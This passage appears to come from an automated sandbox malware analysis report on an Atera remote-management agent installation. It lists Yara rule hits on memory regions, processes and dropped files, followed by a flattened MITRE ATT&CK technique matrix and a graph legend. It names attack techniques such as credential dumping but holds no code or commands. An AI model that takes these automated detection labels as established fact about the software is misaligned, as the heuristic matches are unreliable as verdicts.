                                Source: Yara matchFile source: 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1903414217.0000023400440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1916974804.0000023476656000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000035.00000002.2143874595.000002139B0F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.1595672822.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1585649904.000001FD5A0F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000003.1309119878.0000000004CE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000035.00000002.2143874595.000002139B4ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.1609284413.000001A1145B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1922183275.0000023477B52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000037.00000002.2103371672.000001CC12F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000033.00000002.2566768207.00000248450A2000.00000002.00000001.01000000.00000047.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002C.00000002.2110035392.000001F140C64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2152969045.000001A881F0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2271722102.0000013262BE3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1903414217.00000234002D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1582681527.000001FD419E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.1850146314.00000246BACDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2271722102.0000013262A9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2461327312.000001327BB67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1922183275.0000023477B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000035.00000002.2143874595.000002139B43D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1920033330.000002347761B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000035.00000002.2133420336.000002139A941000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002C.00000002.2110035392.000001F140C4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.1857899782.00000246BAFB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003A.00000002.2116373812.00000165983D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000035.00000002.2270718409.00000213B3AB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000037.00000002.2103371672.000001CC12D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.1447302960.000001E728606000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2274299424.0000010B00176000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2271722102.0000013262BA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2152969045.000001A88217A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2141115637.000001A881090000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2040710352.000002E7232BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1916974804.000002347660D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1582681527.000001FD419B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2251027525.0000013261D40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2398266422.000001A89A5C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2268549247.0000013262000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2149932355.000001E43325B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000033.00000002.2561414784.0000024844E6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.1811166531.0000022AC0000000.00000004.00000020.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2275598448.000001E44C3EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.1447302960.000001E72852C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2271722102.0000013262915000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1941036386.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003A.00000002.2107478739.0000016597920000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000003.1711140575.000001E04A2B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2152969045.000001A881DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.1811600613.0000022AC01C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2375885446.0000010B6E6CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.1609284413.000001A114541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000002.2261344785.000001DCFD93F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003A.00000002.2115830756.0000016597FE2000.00000002.00000001.01000000.00000031.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1903414217.0000023400239000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2557688468.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2152969045.000001A881DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000033.00000002.2566346650.0000024845082000.00000002.00000001.01000000.00000046.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2142200483.000002E723480000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.1447302960.000001E728529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000002.1712292316.000001E04A4C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000037.00000002.2079198013.000001CC124C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2170099989.000001E433C46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2152969045.000001A882139000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000002.2092308272.000001449A500000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.1450070040.000001E740FDF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.1359772261.0000000004CC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000002.2185783714.0000027055958000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.1860673712.00000246BB7D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000033.00000002.2571688057.0000024845621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.1582648644.0000026AD23B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2152969045.000001A8821DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.1582648644.0000026AD2423000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.1359772261.0000000004D64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2170099989.000001E433AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000035.00000002.2143874595.000002139B72D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2376340769.000001A89A23A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.1813948689.0000022AC0F93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2152969045.000001A881951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2144565646.000002E723C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000002.2185783714.0000027055AEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2274299424.0000010B00287000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7700, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7808, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7884, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AteraAgent.exe PID: 8144, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AteraAgent.exe PID: 7016, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7508, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageAgentInformation.exe PID: 7892, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageAgentInformation.exe PID: 7880, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageAgentInformation.exe PID: 8112, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AteraAgent.exe PID: 1504, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageAgentInformation.exe PID: 2508, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 4008, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageSTRemote.exe PID: 3916, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: cscript.exe PID: 7808, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageMonitoring.exe PID: 2120, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageAgentInformation.exe PID: 8036, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 8028, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: cscript.exe PID: 8064, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageUpgradeAgent.exe PID: 7956, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageUpgradeAgent.exe PID: 2260, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageTicketing.exe PID: 8096, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageProgramManagement.exe PID: 8132, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageInternalPoller.exe PID: 5456, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1468, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageMarketplace.exe PID: 6428, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageMonitoring.exe PID: 7808, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Config.Msi\4c9994.rbs, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF6D3CFC025FA64744.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\log.txt, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF25FF7DC86312E06B.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFD9D91EC098F6A6B5.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Config.Msi\4c999c.rbs, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.ModelsV3.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFCB414AE811CAE186.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF1180A11919FC8284.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFE2DCB96B45A4216C.TMP, type: DROPPED
                                Source: Yara matchFile source: \Device\ConDrv, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallLog, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFE61BD4C904D39D5F.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF9EA48A1BC6835568.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\10-02-2024 11_20_47-log.txt, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF6A5C398114511295.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.32_(x64)_20241002112056_001_dotnet_hostfxr_6.0.32_win_x64.msi.log, type: DROPPED
                                Source: Yara matchFile source: C:\Config.Msi\4c998f.rbs, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF37AF000510E2973B.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF53FE20EEA41BFF79.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFBA948CC462860B39.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF815BDE1D565DD95C.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFB9516BEB2A4CA1D5.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF454FE3DE1E4F4BC4.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF6E5CDEA7C35F1C0C.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFD433CA0145E2A93A.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF6ED209FDEBEBE8CC.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\System32\InstallUtil.InstallLog, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI1C9.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFA50F4A555F2C8793.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIBB81.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF95A16CC7A7D38448.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF80A59696F5CFEB2C.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFB011B7D4783F73EF.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\AteraSetupLog.txt, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIDBBE.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF4E49B63DDB425763.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIA259.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF41CA58E5D53CE8A0.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF47CBA181FC761D28.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\chocolatey.log, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF47F9F8C35B0B61B8.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFE8E4786049387F04.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF2E6CEB805A1AD5D7.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF8D51130C93BB6C0C.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\10-02-2024 11_20_36-log.txt, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSID8C1.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFA974D720F5B64201.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI9B15.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFE6A2605396FBB224.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF5D2DFBC75319C511.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFB3D323C48CA9AB48.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\choco.summary.log, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.32_(x64)_20241002112056_002_dotnet_host_6.0.32_win_x64.msi.log, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF0B294D66713B8AC8.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIB4E8.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFFCBA91410B3A4758.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF76E732F4A95E30F1.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.32_(x64)_20241002112056_000_dotnet_runtime_6.0.32_win_x64.msi.log, type: DROPPED
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EFB9F0 GetModuleHandleW,OutputDebugStringA,GetProcAddress,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,OutputDebugStringA,GetLastError,GetProcAddress,OutputDebugStringA,OutputDebugStringA,CorBindToRuntimeEx,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,_snprintf,OutputDebugStringA,37_2_00007FFB02EFB9F0

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information1
                                Scripting                                		1
                                Replication Through Removable Media                                		641
                                Windows Management Instrumentation                                		1
                                Scripting                                		1
                                DLL Side-Loading                                		21
                                Disable or Modify Tools                                		OS Credential Dumping2
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		2
                                Encrypted Channel                                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                CredentialsDomainsDefault Accounts1
                                Native API                                		1
                                DLL Side-Loading                                		32
                                Windows Service                                		1
                                Deobfuscate/Decode Files or Information                                		LSASS Memory11
                                Peripheral Device Discovery                                		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts1
                                Command and Scripting Interpreter                                		32
                                Windows Service                                		111
                                Process Injection                                		4
                                Obfuscated Files or Information                                		Security Account Manager3
                                File and Directory Discovery                                		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts11
                                Scheduled Task/Job                                		11
                                Scheduled Task/Job                                		11
                                Scheduled Task/Job                                		1
                                Software Packing                                		NTDS275
                                System Information Discovery                                		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts11
                                Service Execution                                		Network Logon ScriptNetwork Logon Script1
                                Timestomp                                		LSA Secrets1
                                Query Registry                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                DLL Side-Loading                                		Cached Domain Credentials781
                                Security Software Discovery                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                File Deletion                                		DCSync11
                                Process Discovery                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job123
                                Masquerading                                		Proc Filesystem371
                                Virtualization/Sandbox Evasion                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                                Modify Registry                                		/etc/passwd and /etc/shadow1
                                Application Window Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron371
                                Virtualization/Sandbox Evasion                                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd111
                                Process Injection                                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                                Rundll32                                		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
